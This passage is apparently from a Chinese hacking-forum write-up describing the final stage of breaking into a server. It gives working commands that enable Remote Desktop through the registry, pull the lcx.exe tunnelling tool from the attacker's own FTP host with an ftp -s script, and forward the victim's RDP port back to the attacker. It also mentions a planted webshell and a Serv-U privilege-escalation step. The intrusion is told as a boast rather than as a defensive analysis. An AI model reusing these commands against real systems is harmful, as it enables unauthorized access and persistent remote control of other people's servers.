然后就是开3389，转出端口，执行reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f，成功，

　　接下来要传转发工具去了。首先在本地搭建好FTP服务器。然后在对方服务器器上写一个dat文件，内容如下：

　　open ip

　　username

　　mima

　　get lcx.exe c:\lcx.exe

　　bye

　　保存为1.dat

　　然后在服务器通过ftp –s:1.dat命令传了个lcx.exe上去，本机执行lcx –listen 38 3388 , 服务器执行lcx –slave 我的ip 38 127.0.0.1 3389,然后利用我们建的超级用户连接本机3388端口，成功登录如图：

　　此次提权到此结束。这次提权用到了很多老的方法，但是都夭折了。

　　Novaa:

　　真的十分感谢Rebeyond，这次拿站过程学到了很多东西。!

　　其实利用大马自带的SERV-U提权工具进行提权是行的通的(如图)。!

　　只不过DOMAIN要换为.14而不是那个默认的.13的。该服务器貌似有2个内网IP(一手夹烟得出的，谢谢一手)。

版权声明：转载请注明来自于“华夏黑客同盟”，否则将追究法律责任。